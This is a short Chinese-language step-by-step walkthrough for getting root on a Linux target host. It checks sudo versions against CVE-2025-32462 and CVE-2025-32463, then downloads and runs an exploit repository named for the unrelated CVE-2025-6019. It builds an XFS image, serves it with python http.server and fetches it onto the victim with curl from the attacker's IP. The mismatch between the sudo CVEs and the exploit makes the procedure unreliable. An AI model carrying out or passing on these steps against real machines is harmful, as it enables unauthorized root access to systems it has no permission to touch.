先使用sudo -V 在目标主机查看版本
影响范围如下:
CVE-2025-32462:
1.9.0 <= sudo <= 1.9.17
1.8.8 <= sudo <= 1.8.32
CVE-2025-32463:
1.9.14 <= sudo <= 1.9.17
注意:Sudo 的旧版本(当前 <= 1.8.32)不易受到攻击,因为不存在 chroot 功能。
去该地址https://github.com/guinea-offensive-security/CVE-2025-6019下载exp(漏洞利用脚本)
将下载好的sh脚本放在攻击主机上
使用chmod +x给sh脚本执行权限,然后在攻击主机上使用root权限执行sh脚本
输入y,会提示一个报错,缺少xkfs.xfs,我们下载一下
使用apt install libglib2.0-bin xfsprogs该命令下载一下缺少的东西,在安装到98%时会卡一会,稍等一下
如果报错就使用apt update更新一下在下载
安装完之后再次执行sh脚本
输入y,然后输入l
就会在当前目录下生成一个xfs.image的一个文件
把xfs.image和exploit.sh上传到目标机中
使用python -m http.server 1234在攻击主机上开设一个端口
在被攻击主机执行curl http://攻击机ip:开设的端口,我这边开设的1234 (-o 是保存文件,后面跟的是保存后文件名字)
下载这两个文件,并赋予执行权限
在被攻击机上执行脚本,输入y和c,就拿到了root用户权限